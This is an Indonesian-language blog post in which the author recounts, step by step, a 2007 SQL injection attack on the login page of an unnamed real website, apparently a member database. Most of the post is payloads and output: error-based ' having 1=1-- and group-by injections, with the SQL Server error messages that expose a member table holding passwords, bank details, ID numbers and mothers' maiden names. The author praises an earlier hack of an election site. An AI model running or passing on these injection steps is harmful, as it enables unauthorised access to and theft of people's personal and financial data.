Teknik SQL Injection

Ini adalah teknik SQL Injection yg saya pakai untuk meng-hack disalah satu situs. Teknik ini seperti telah digunakan oleh para hacker didunia seperti juga yang sudah pernah digunakan oleh "Dani Firmansyah (xnuxer)" yang sudah meng-hack situs KPU dan mengganti nama-nama partai didalamnya menjadi tidak karuan.


Jalannya SQL Injection yang saya pakai untuk pertama kalinya ini tadi (kamis, 5/12/2007) adl:

Target : www.dirahasiakan.com
Methode: SQL Injection
* tulis perintah ' having 1=1-- pada username untuk admin, password terserah
* tulis perintah id=2119&idm=40&idSM=2 dibelakang address bar .../login.asp?

** Pada saat dilakukan cara pertama, muncul error:
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'mlmf01.No_Anggota' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
/login.asp, line 37

** Back> Lalu ketikkan ' group by mlmf01.No_Anggota having 1=1-- Enter

** Ada Error lagi, sekarang didapat:
Tabel : mlmf01
Fields : No_Anggota, Nama_Anggota, dst

** Ketikkan kode lagi sampai berulang kali:
' group by mlmf01.No_Anggota, mlmf01.Nama_Anggota, ....., ..... having 1=1--

** Setelah semuanya selesai, didapat:
' group by mlmf01.No_Anggota, mlmf01.Nama_Anggota, mlmf01.PSW, mlmf01.Al1, mlmf01.Al2, mlmf01.Al3, mlmf01.Kota, mlmf01.Propinsi, mlmf01.KodePos, mlmf01.No_ID, mlmf01.No_Tlp, mlmf01.No_HP, mlmf01.Email, mlmf01.Rek_Bank, mlmf01.Kode_Bank, mlmf01.Cabang_Bank, mlmf01.Kota_Bank, mlmf01.Nama_Nasabah, mlmf01.JK, mlmf01.Tgl_Lahir, mlmf01.Pendidikan_Akhir, mlmf01.Pekerjaan, mlmf01.Agama, mlmf01.Ibu_Kandung, mlmf01.Usia_Ibu, mlmf01.Almarhumah, mlmf01.Status_Pasangan, mlmf01.Nama_Pasangan, mlmf01.Tgl_Lahir_Pasangan, mlmf01.Hub_Ahli_Waris, mlmf01.Nama_Ahli_Waris, mlmf01.Tgl_Lahir_Waris, mlmf01.Distributor, mlmf01.No_Sponsor, mlmf01.Tgl_Join, mlmf01.Kode_Distributor, mlmf01.Distributor_Pembayar_Bonus, mlmf01.Location_Id, mlmf01.Path_Tree, mlmf01.No_Parent, mlmf01.Serial_Number, mlmf01.RecTime, mlmf01.DG, mlmf01.Expired, mlmf01.Aktif, mlmf01.Tgl_Hibah, mlmf01.No_Anggota_Penghibah, mlmf01.Pernah_Expired, mlmf01.No_Sponsor_Extra, mlmf01.Level1, mlmf01.Web, mlmf01.Aktif_Rekrut, mlmf01.Aktif_Beli_Pulsa, mlmf01.Tgl_Capai_Bns, mlmf01.No_Anggota_Ex, mlmf01.No_Anggota_Jar, mlmf01.Rek_Bank_Paralel, mlmf01.Kode_Bank_Paralel, mlmf01.Customer_Id, mlmf01.Bns_hrg_5, mlmf01.Bns_hrg_6, mlmf01.Bns_hrg_7, mlmf01.Bns_hrg_8, mlmf01.Bns_hrg_9, mlmf01.Bns_hrg_10, mlmf01.LeaderShip, mlmf01.msrepl_tran_version having 1=1--

** Dan pesan error terakhir:
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]The text, ntext, and image data types cannot be compared or sorted, except when using IS NULL or LIKE operator.
/login.asp, line 37

** Setelah itu, akan dilanjutkan dengan kode berikutnya... akses putus. Wah... masih newbie sih...

Di posting oleh : Pada No comments:
Tag :
Subscribe to: Posts (Atom)